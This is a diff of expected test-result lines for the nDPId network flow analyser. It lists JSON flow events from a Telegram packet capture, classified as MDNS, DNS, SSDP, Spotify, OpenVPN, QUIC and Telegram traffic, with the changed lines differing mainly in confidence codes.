+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1588779626394,"flow_last_seen":1588779626394,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00809{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1588779626393,"flow_last_seen":1588779626393,"flow_idle_time":200000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.43","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779650652,"flow_last_seen":1588779650666,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49533,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1588779603320,"flow_last_seen":1588779603320,"flow_idle_time":200000,"flow_min_l4_payload_len":278,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":278,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.53","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1588779597291,"flow_last_seen":1588779653520,"flow_idle_time":200000,"flow_min_l4_payload_len":278,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":2502,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.75","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":120,"flow_first_seen":1588779596708,"flow_last_seen":1588779655297,"flow_idle_time":200000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":19803,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.75","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1588779596465,"flow_last_seen":1588779654853,"flow_idle_time":200000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":2177,"flow_avg_l4_payload_len":311,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.69","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779615961,"flow_last_seen":1588779615961,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.52","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1588779596464,"flow_last_seen":1588779654853,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":1316,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1588779596464,"flow_last_seen":1588779654853,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":196,"flow_tot_l4_payload_len":1316,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} 00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1588779639103,"flow_last_seen":1588779650102,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"87.11.205.195","src_port":28150,"dst_port":59772,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1588779639103,"flow_last_seen":1588779650102,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"87.11.205.195","src_port":28150,"dst_port":59772,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1588779636498,"flow_last_seen":1588779636498,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1588779608134,"flow_last_seen":1588779649019,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1588779637830,"flow_last_seen":1588779640832,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"239.255.255.250","src_port":52127,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779617174,"flow_last_seen":1588779618677,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"87.11.205.195","src_port":23174,"dst_port":60723,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1588779634764,"flow_last_seen":1588779634797,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2728,"flow_avg_l4_payload_len":909,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"216.58.205.68","src_port":50822,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779628757,"flow_last_seen":1588779628804,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49764,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779596464,"flow_last_seen":1588779598465,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":54306,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1588779648840,"flow_last_seen":1588779654853,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":504,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":56384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1588779637543,"flow_last_seen":1588779651686,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.1","src_port":28150,"dst_port":529,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":298,"flow_first_seen":1588779637543,"flow_last_seen":1588779654458,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":272,"flow_tot_l4_payload_len":54896,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.8","src_port":28150,"dst_port":529,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1588779637543,"flow_last_seen":1588779651659,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.3","src_port":28150,"dst_port":530,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":288,"flow_first_seen":1588779637543,"flow_last_seen":1588779654458,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":57312,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.1","src_port":28150,"dst_port":533,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1588779637543,"flow_last_seen":1588779651680,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1744,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.3","src_port":28150,"dst_port":537,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1588779637543,"flow_last_seen":1588779651645,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.5","src_port":28150,"dst_port":537,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779607374,"flow_last_seen":1588779607388,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":52118,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Cloud"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1588779636498,"flow_last_seen":1588779636498,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1588779608134,"flow_last_seen":1588779649019,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":320,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1588779637830,"flow_last_seen":1588779640832,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"239.255.255.250","src_port":52127,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00815{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779617174,"flow_last_seen":1588779618677,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"87.11.205.195","src_port":23174,"dst_port":60723,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"OpenVPN","breed":"Acceptable","category":"VPN"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1588779634764,"flow_last_seen":1588779634797,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2728,"flow_avg_l4_payload_len":909,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"216.58.205.68","src_port":50822,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779628757,"flow_last_seen":1588779628804,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49764,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1588779596464,"flow_last_seen":1588779598465,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":54306,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1588779648840,"flow_last_seen":1588779654853,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":504,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":56384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1588779637543,"flow_last_seen":1588779651686,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.1","src_port":28150,"dst_port":529,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":298,"flow_first_seen":1588779637543,"flow_last_seen":1588779654458,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":272,"flow_tot_l4_payload_len":54896,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.8","src_port":28150,"dst_port":529,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1588779637543,"flow_last_seen":1588779651659,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.3","src_port":28150,"dst_port":530,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":288,"flow_first_seen":1588779637543,"flow_last_seen":1588779654458,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":57312,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.8.1","src_port":28150,"dst_port":533,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1588779637543,"flow_last_seen":1588779651680,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1744,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.16.3","src_port":28150,"dst_port":537,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1566,"source":"telegram.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1588779637543,"flow_last_seen":1588779651645,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1588779655298,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"91.108.12.5","src_port":28150,"dst_port":537,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Telegram","breed":"Acceptable","category":"Chat"}} 